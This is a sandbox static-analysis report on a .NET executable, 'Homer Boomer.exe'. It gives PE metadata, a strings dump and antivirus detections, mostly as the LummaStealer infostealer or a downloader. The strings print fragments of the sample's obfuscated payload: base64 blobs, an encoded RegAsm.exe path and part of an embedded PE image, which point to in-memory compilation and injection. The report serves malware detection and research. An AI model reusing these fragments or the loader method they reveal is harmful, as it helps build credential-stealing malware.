popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

PE Compile Time

2055-05-13 03:11:33

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00002000 0x000f3ae4 0x000f3c00 3.77489847724
.rsrc 0x000f6000 0x00000636 0x00000800 3.49369950581
.reloc 0x000f8000 0x0000000c 0x00000200 0.101910425663

Resources

Name Offset Size Language Sub-language File type
RT_VERSION 0x000f60a0 0x000003aa LANG_NEUTRAL SUBLANG_NEUTRAL Dyalog APL workspace 32-bit classic big-endian version 52.0
RT_MANIFEST 0x000f644c 0x000001ea LANG_NEUTRAL SUBLANG_NEUTRAL XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

Library mscoree.dll:
0x402000 _CorExeMain
!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
get_UTF8
<Module>
TransformData
mscorlib
System.Collections.Specialized
GetMethod
CompileAssemblyFromSource
get_BigEndianUnicode
Invoke
GetType
MethodBase
GuidAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
Homer Boomer.exe
Resize
Encoding
System.Runtime.Versioning
FromBase64String
GetString
keyString
get_Length
Program
System
System.Reflection
StringCollection
MethodInfo
Microsoft.CSharp
CSharpCodeProvider
CodeDomProvider
System.CodeDom.Compiler
Homer Boomer
.cctor
System.Diagnostics
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
get_ReferencedAssemblies
GetBytes
inputBytes
CompilerParameters
CompilerResults
Object
GetStart
Convert
System.Text
get_CompiledAssembly
set_GenerateInMemory
WrapNonExceptionThrows
Homer Boomer
Copyright
Homer Boomer 2024
$38032EB9-456B-4595-918E-5488697FA994
11.7.2.9
.NETFramework,Version=v4.8
FrameworkDisplayName
.NET Framework 4.8
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
W.#e.+e.3w.;e.Ce.K}.Se.[w.c
NkxyMHAvcnB6ckRsNmF6dzhwREQ2THIvODY2OW11UzY2YXo3czQzMHFQcW44cnJpOUtydThwREQ2THIvODY2OW11UzY2YXo3czV2b3ArbWc4S3k0MUtmcHJPK203WnJ6NzcvMHF2aTZwc1Nja01QdHZQK2w5S3EyL3FYOHV1N3AxYWo3K0x2TnZPNmhrTVB0a01POTZiM3B2cnZ6K3FEeXA3Mks4cWZnK0x2dW9QS24wS3ppOWFiNXVwRER2ZW0ydmJub3EvR2cvdW5sNmFqcG9QN3AxS2ZpclArOWl2S242NnprNlozeWdQTzlyUCsrLzdEcHJNYVV2Yi8zOGJ6NDViMmc4NzIyN3IzOHUrbUE4NjN6NWVDUXc3M3B2ZW50a01POTZiM3B2ZW0ydmJ2NHZlaTc4K25VOUwzZXB2Ty8rTHZpK0x1em5mS0E4NzJucStIcnFQRzgrT1cyN3IzOHUrbUE4NjN6NWVDbXhKZnB2ZW0yNE1TWHhKZnB2ZW0yN2J6L3BmU3F2YnJpL0wzMHFyMkE4NzJscituZXB2Ty8rTHZpeWFiVXArbjZyK0gwNUwzNGtzRHA2Nmo2Nkt5eDZmU242ZW5sNmFqdnZkU24rYXp1dE1TWDZiM3B2YktibCttOTZiM3B2ZW0yNzZ6cHZPK252WXYvNllyeXArdXM3NzN6NytmSnB0U242ZnFrdGIvOHBlaXNzZW5sNmFqdnZkU24rYXp1dFBLUXc3M3B2ZW5ya01PUXc3M3B2ZW5tNkt2eG9QN3A3cjMzNmFEKzZmK3c2YXpOd09uZXB2Ty8rTHZpeWFiZnNPbXM3dUgvODcyOXYveWw2S3kva01POTZiM3A1c1NjdmVtOTZiM3B2ZW5rK0wzb3UvUHAzNkRpM3FienYvaTc2YXprczQ3NHZkK3c2YXpsdGIvOHBlaXN0UEtibCttOTZiMjBrTU8ydmVtOTZ2aW4rYnZ6K3FEeXA1RERrTU8ydmVtOTZ1K3MrcUQ1OCtuY3VmU0gvS1R6
U3lzdGVtLmRsbA==
U3lzdGVtLkNvcmUuZGxs
SGFtZXJQdXNo
QXBwR2V0UHVzaFN0YXJ0
QzpcXFdpbmRvd3NcXE1pY3Jvc29mdC5ORVRcXEZyYW1ld29ya1xcdjQuMC4zMDMxOVxcUmVnQXNtLmV4ZQ==
5aSN5aSN5aSN5aSN5Yi25aSN5Li95aSN5aSN
TVp4AAEAAAAEAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAeAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuJAAAUEUAAEwBBADJSPVmAAAAAAAAAADgAAIBCwEOAACmBAAA0AAAAAAAANDOAAAAEAAAAAAAAAAAQAAAEAAAAAIAAAYAAAAAAAAABgAAAAAAAAAAMAYAAAQAAAAAAAACAECFAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAAAAAAAAAAACK5QQAeAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADgBQBcSAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAArOYEAKgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAAE2lBAAAEAAAAKYEAAAEAAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAACxKQAAAMAEAAAqAAAAqgQAAAAAAAAAAAAAAAAAQAAAQC5kYXRhAAAAUO8AAADwBAAAXAAAANQEAAAAAAAAAAAAAAAAAEAAAMAucmVsb2MAAFxIAAAA4AUAAEoAAAAwBQAAAAAAAAAAAAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
Homer Boomer
CompanyName
Homer Boomer
FileDescription
Homer Boomer
FileVersion
11.7.2.9
InternalName
Homer Boomer.exe
LegalCopyright
Copyright
Homer Boomer 2024
LegalTrademarks
Homer Boomer
OriginalFilename
Homer Boomer.exe
ProductName
Homer Boomer
ProductVersion
11.7.2.9
Assembly Version
11.7.2.9
Antivirus Signature
Bkav W32.AIDetectMalware.CS
Lionic Trojan.Win32.LummaStealer.4!c
Elastic malicious (high confidence)
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh BehavesLike.Win32.AgentTesla.dz
ALYac Gen:Variant.MSILHeracles.181791
Cylance Unsafe
Zillya Clean
Sangfor Suspicious.Win32.Save.a
CrowdStrike win/malicious_confidence_100% (D)
Alibaba Trojan:MSIL/Generic.43180134
K7GW Trojan-Downloader ( 005bad3f1 )
K7AntiVirus Trojan-Downloader ( 005bad3f1 )
huorong Clean
Baidu Clean
VirIT Clean
Paloalto generic.ml
Symantec ML.Attribute.HighConfidence
tehtris Clean
ESET-NOD32 Win32/Spy.LummaStealer.G
APEX Malicious
Avast Win32:MalwareX-gen [Trj]
Cynet Clean
Kaspersky Clean
BitDefender Gen:Variant.MSILHeracles.181791
NANO-Antivirus Trojan.Win32.KillProc2.kshkuw
ViRobot Clean
MicroWorld-eScan Gen:Variant.MSILHeracles.181791
Tencent Msil.Trojan-QQPass.QQRob.Jqil
Sophos Mal/Generic-S
F-Secure Trojan.TR/Dropper.Gen
DrWeb Trojan.KillProc2.23694
VIPRE Gen:Variant.MSILHeracles.181791
TrendMicro TrojanSpy.Win32.LUMMASTEALER.YXEI1Z
McAfeeD Real Protect-LS!BFA1E7E35D16
Trapmine Clean
CTX exe.trojan.lummastealer
Emsisoft Gen:Variant.MSILHeracles.181791 (B)
Ikarus Trojan-Downloader.MSIL.Agent
FireEye Generic.mg.bfa1e7e35d167b38
Jiangmin Clean
Webroot Clean
Varist W32/ABTrojan.ZDVD-3436
Avira TR/Dropper.Gen
Fortinet MSIL/Agent.RGJ!tr.dldr
Antiy-AVL Trojan/Win32.LummaStealer
Kingsoft Win32.Troj.Unknown.a
Gridinsoft Trojan.Win32.Downloader.sa
Xcitium Malware@#1cg2tl89826o7
Arcabit Trojan.MSILHeracles.D2C61F
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Trojan:Win32/LummaStealer.CCJR!MTB
Google Detected
AhnLab-V3 Trojan/Win.LummaStealer.C5675801
Acronis Clean
McAfee Artemis!BFA1E7E35D16
TACHYON Clean
VBA32 Malware-Cryptor.MSIL.Delta.Heur
Malwarebytes Malware.AI.3954812059
Panda Trj/CI.A
Zoner Clean
TrendMicro-HouseCall TrojanSpy.Win32.LUMMASTEALER.YXEI1Z
Rising Malware.Obfus/MSIL@AI.100 (RDM.MSIL2:UBUZ6e2GQiZosx43ad775Q)
Yandex Clean
SentinelOne Static AI - Malicious PE
MaxSecure Trojan.Malware.300983.susgen
GData Gen:Variant.MSILHeracles.181791
AVG Win32:MalwareX-gen [Trj]
DeepInstinct MALICIOUS
alibabacloud Trojan[stealer]:Win/LummaStealer.G
No IRMA results available.